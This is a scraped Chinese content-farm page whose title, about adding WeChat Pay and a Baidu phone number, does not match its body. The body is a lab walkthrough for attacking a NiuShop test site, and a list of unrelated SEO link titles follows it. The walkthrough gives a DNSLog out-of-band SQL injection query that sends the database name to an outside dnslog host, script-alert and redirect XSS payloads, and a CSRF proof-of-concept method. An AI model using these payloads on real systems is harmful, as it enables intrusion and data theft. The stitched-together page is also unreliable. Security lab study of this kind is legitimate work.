当前位置: 首页 > news >正文

网站添加微信支付百度官方电话人工服务电话

网站添加微信支付,百度官方电话人工服务电话,重庆网站备案系统,佛山建网站靶场搭建 将 niushop-master.zip 压缩包放到网站的根目录#xff0c;解压后访问 浏览器访问 install.php #xff0c;根据提示安装即可 1.SQL注入漏洞 随便选择一种商品分类#xff0c;发现有参数#xff0c;测试注入 测试闭合发现页面报错有sql注入 应该是环境的问题解压后访问 浏览器访问 install.php 根据提示安装即可 1.SQL注入漏洞 随便选择一种商品分类发现有参数测试注入 测试闭合发现页面报错有sql注入 应该是环境的问题但是这不影响我们判断存在sql注入 该网站还有一处sql注入漏洞我们可以进入后台系统--设置--数据库管理--SQL执行与导入 输入查询语句点击执行成功执行但是我们得不到具体信息这时需要利用外带注入方法 外带原理将dnslog平台中的特有字段payload带⼊⽬标发起dns请求通过dns解析将请求后的关键信息组合新的三级域名带出在dns服务器的dns⽇志中显示出来 DNSLog Platform select load_file(concat(\\\\,(select database()),.95xpzc.dnslog.cn\\abc)) 文件上传漏洞 1.首先写一个一句话木马 XSS漏洞 反射型xss漏洞 登录后台系统--设置--基础设置--商城第三方统计代码 在输入框中输入js弹窗代码,然后点击提交 scriptalert(1)/script 返回前端页面刷新出现弹窗 后台系统还有一处反射型xss漏洞点击网站--广告位--添加广告 scriptalert(1)/script 返回前端刷新点击该广告页面会出现弹窗 存储型xss漏洞 后台系统还有一处点击网站--广告位--添加广告 这里的 链接地址 可以尝试xss 在自己网站的根目录新建一个 2.html 文件内容如下 scriptdocument.locationhttp://www.baidu.com/script 链接地址修改为www下的 2.html 返回前端刷新页面点击此广告页面就会跳转到设置的界面 CSRF漏洞 注册一个普通用户登录以后修改基本信息 使用bp抓取提交信息的请求包鼠标右键--相关工具--生成CSRF-Poc--复制HTML 将复制的内容放到自己本地网站的根目录浏览器访问 点击按钮就会发现用户信息被修改说明存在CSRF漏洞 支付漏洞
http://www.hkea.cn/news/14369181/

相关文章:

  • 哪个网站做网站方便做国际网站要多少钱
  • 公司网站 用 个人备案域名用 可以做网站软件吗
  • 电子商务商城网站建设免费seo快速排名工具
  • 网站链接优化做鲜榨果汁店网站
  • 做兼职网站企业网络营销策划与分析
  • 国外创意网站设计欣赏wordpress已计划
  • 公司软件网站开发怎么入账我的世界封面制作网站
  • 摄影网站参考文献徐州建站程序
  • 大连零基础网站建设培训哪里有黄骅网站建设价格
  • 重庆保姆网杭州萧山区抖音seo排行榜
  • 东莞大朗网站建设哪家口碑好泉州seo搜索优化合作
  • 昆山高端网站设计公司长沙制作网页联系方式
  • 网站建设栏目怎么介绍网络系统管理技能大赛竞赛科目
  • 宿迁市网站建设推广软件哪个好
  • 如何在asp网站网页设计大专工资一般多少
  • 免费毕业设计的网站建设如何拿qq空间做网站
  • php网站开发开题报告网站建设公司的出路
  • 网站需要写哪些内容吗公司如何建立网站
  • 公司网站制作模板房地产设计师
  • 咸阳做网站xymokj百度口碑官网
  • 唐卡装饰集团 一站式超级体验店女孩子做运营是不是压力很大
  • 网站销售怎么做的百度seo排名报价
  • 做一个企业的网站怎么做鹤壁海绵城市建设官方网站
  • 如何做tiktok的数据排行网站苏州有什么好玩的推荐
  • 电子商务网站开发实训总结微信小程序介绍
  • 建设信源网站产品推广方案怎么写
  • 外包优化网站杭州网站推广方案平台
  • 深圳狮子会网站唐山市城乡建设网站
  • 同德县公司网站建设广告设计公司绩效考核
  • 网站外链建设工作计划站长查询域名